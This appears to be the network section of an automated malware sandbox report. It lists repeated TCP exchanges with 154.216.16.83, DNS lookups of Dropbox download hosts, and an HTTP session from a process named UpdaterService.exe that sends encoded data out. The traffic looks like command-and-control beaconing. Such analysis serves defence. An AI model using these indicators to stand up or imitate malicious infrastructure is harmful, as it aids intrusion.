Dec 14, 2024 21:53:31.325180054 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:31.626616001 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:31.673454046 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:33.314515114 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:33.436880112 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:33.738140106 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:33.782651901 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:35.673818111 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:35.793592930 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:36.094644070 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:36.142210960 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:37.643296957 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:37.763134956 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:38.064368963 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:38.110829115 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:39.642271042 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:39.762048960 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:40.066319942 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:40.110937119 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:41.876887083 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:41.996803045 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:42.416450024 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:42.470195055 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:44.098922968 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:44.218846083 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:44.520047903 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:44.563941956 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:46.204698086 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:46.324956894 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:46.625952959 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:46.673393965 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:47.736126900 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:47.855937958 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:48.157100916 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:48.204610109 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:49.267318010 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:49.388263941 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:49.707124949 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:49.751421928 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:51.221241951 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:51.341165066 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:51.642440081 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:51.689075947 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:53.341586113 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:53.461478949 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:53.762638092 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:53.813968897 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:55.236291885 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:55.356142998 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:55.657146931 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:55.704587936 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:57.501713037 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:57.622518063 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:57.923047066 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:57.970298052 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:59.064596891 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:59.184643030 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:59.485977888 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:59.532895088 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:00.501667976 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:00.622068882 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:00.923300982 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:00.970168114 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:02.329818964 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:02.450437069 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:02.751693010 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:02.798295021 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:04.005456924 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:04.125435114 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:04.426675081 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:04.470182896 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:05.829752922 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:05.949394941 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:06.264544010 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:06.313982964 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:07.345360994 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:07.465790987 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:07.766984940 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:07.813924074 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:09.439404964 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:09.559560061 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:09.877593994 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:09.923326015 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:11.173482895 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:11.293184996 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:11.608510017 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:11.657670021 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:13.296947002 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:13.417078972 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:13.718210936 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:13.767086029 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:15.142384052 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:15.262357950 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:15.563761950 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:15.610869884 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:17.173878908 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:17.293803930 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:17.594839096 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:17.642258883 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:19.236192942 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:19.355900049 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:19.657073021 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:19.704644918 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:20.720413923 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:20.840363979 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:21.153114080 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:21.204618931 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:22.877588987 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:22.997474909 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:23.298767090 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:23.345190048 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:25.111277103 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:25.230974913 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:25.532589912 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:25.579566956 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:26.939268112 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:27.059165955 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:27.361299992 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:27.407697916 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:28.829925060 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:28.950546026 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:29.251754045 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:29.298500061 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:30.927840948 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:31.047780037 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:31.349307060 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:31.392079115 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:32.486284971 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:32.606503010 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:32.911854029 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:32.954566002 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:34.111007929 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:34.233434916 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:34.533312082 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:34.579576969 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:36.142416954 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:36.262660980 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:36.563908100 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:36.610898972 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:38.220432043 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:38.340320110 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:38.642829895 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:38.688983917 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:39.829833031 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:39.949747086 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:40.252088070 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:40.298369884 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:42.095489025 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:42.215692997 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:42.516704082 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:42.564065933 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:43.954715014 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:44.074716091 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:44.375988007 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:44.423352957 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:46.251722097 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:46.371838093 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:46.673033953 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:46.720263004 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:48.535016060 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:48.656421900 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:48.971134901 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:49.017153978 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:50.407924891 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:50.567339897 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:50.829165936 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:50.876476049 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:52.517440081 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:52.637356997 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:52.938513041 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:52.989937067 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:54.204735041 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:54.324857950 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:54.626120090 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:54.673399925 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:56.532963991 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:56.653177023 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:56.954349041 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:57.001518011 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:58.892889023 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:54:59.012697935 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:59.328612089 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:54:59.376502991 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:00.611213923 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:00.731106043 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:01.032409906 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:01.079628944 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:02.847768068 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:03.157757044 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:03.202999115 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:03.322516918 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:03.504158020 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:03.548376083 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:04.736131907 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:04.856264114 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:05.158040047 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:05.204632998 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:06.361138105 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:06.482254028 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:06.783377886 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:06.829704046 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:07.876694918 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:07.996870995 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:08.298500061 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:08.345403910 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:09.923778057 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:10.044338942 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:10.345592976 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:10.392160892 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:11.892385006 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:12.014436960 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:12.315907955 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:12.361062050 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:13.704783916 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:13.825330019 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:14.126521111 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:14.173377991 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:15.314502954 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:15.434895039 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:15.736090899 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:15.782800913 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:17.532944918 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:17.653243065 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:17.954463959 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:18.001522064 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:19.720427036 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:19.840508938 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:20.141959906 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:20.189059019 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:22.110996962 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:22.379862070 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:22.681639910 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:22.735877037 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:23.988789082 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:24.113353968 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:24.414558887 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:24.454680920 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:26.267488956 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:26.387722969 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:26.715152025 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:26.767179012 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:28.658024073 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:28.778022051 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:29.079200029 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:29.126530886 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:30.751688957 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:30.871716022 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:31.173042059 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:31.220272064 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:32.770575047 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:32.890794992 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:33.192274094 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:33.236001968 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:35.064241886 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:35.184547901 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:35.485591888 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:35.533190966 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:37.329745054 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:37.450135946 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:37.751589060 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:37.798528910 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:39.392296076 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:39.512583971 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:39.813450098 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:39.860884905 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:41.501697063 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:41.621732950 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:41.922879934 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:41.970269918 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:43.486346006 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:43.607130051 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:43.908328056 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:43.955015898 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:45.314239025 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:45.516505957 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:45.817764044 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:45.860877037 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:47.642700911 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:47.763027906 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:48.064354897 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:48.110901117 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:49.623935938 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:49.744342089 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:50.044929028 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:50.095360994 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:51.142328024 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:51.262993097 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:51.565162897 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:51.610883951 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:53.284135103 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:53.404376030 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:53.705626011 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:53.751653910 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:54.751859903 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:54.871798038 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:55.174561024 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:55.220330000 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:56.845608950 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:56.965594053 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:57.267052889 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:57.314016104 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:58.579940081 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:55:58.700063944 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:59.001393080 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:55:59.048386097 CET	49716	80	192.168.2.5	154.216.16.83

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 21:52:54.672884941 CET	62302	53	192.168.2.5	1.1.1.1
Dec 14, 2024 21:52:54.881097078 CET	53	62302	1.1.1.1	192.168.2.5
Dec 14, 2024 21:52:57.330442905 CET	56568	53	192.168.2.5	1.1.1.1
Dec 14, 2024 21:52:57.641802073 CET	53	56568	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 14, 2024 21:52:54.672884941 CET	192.168.2.5	1.1.1.1	0xcf02	Standard query (0)	www.dropbox.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 21:52:57.330442905 CET	192.168.2.5	1.1.1.1	0xaf8a	Standard query (0)	uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 14, 2024 21:52:54.881097078 CET	1.1.1.1	192.168.2.5	0xcf02	No error (0)	www.dropbox.com	www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 21:52:54.881097078 CET	1.1.1.1	192.168.2.5	0xcf02	No error (0)	www-env.dropbox-dns.com		162.125.65.18	A (IP address)	IN (0x0001)	false
Dec 14, 2024 21:52:57.641802073 CET	1.1.1.1	192.168.2.5	0xaf8a	No error (0)	uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 21:52:57.641802073 CET	1.1.1.1	192.168.2.5	0xaf8a	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.69.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dropbox.com

uceaa44e3ed7199ee43fadd414c8.dl.dropboxusercontent.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	154.216.16.83	80	2876	C:\ProgramData\Updater\UpdaterService.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 21:53:07.970525026 CET	160	OUT	Data Raw: 31 35 35 0d 0a 39 34 69 6c 39 75 69 6c 50 75 69 34 39 32 56 68 52 75 4a 4c 52 49 39 30 50 6c 56 36 67 49 50 33 50 6c 36 6c 39 6c 36 58 39 34 4b 35 53 34 58 6d 4f 6b 46 45 53 34 63 32 52 79 46 51 30 30 58 6d 4f 35 4a 45 53 34 63 32 52 79 46 51 53 Data Ascii: 15594il9uilPui492VhRuJLRI90PlV6gIP3Pl6l9l6X94K5S4XmOkFES4c2RyFQ00XmO5JES4c2RyFQSIXmON6ES4JmRyFf04XmO51ES4qhRyFQSIXmO5JES4TORyFKS0XmLyNAG0X2Rhz8EtZGO4KEp0qGLOz
Dec 14, 2024 21:53:09.185436010 CET	8	IN	Data Raw: 56 49 63 48 69 65 0d 0a Data Ascii: VIcHie
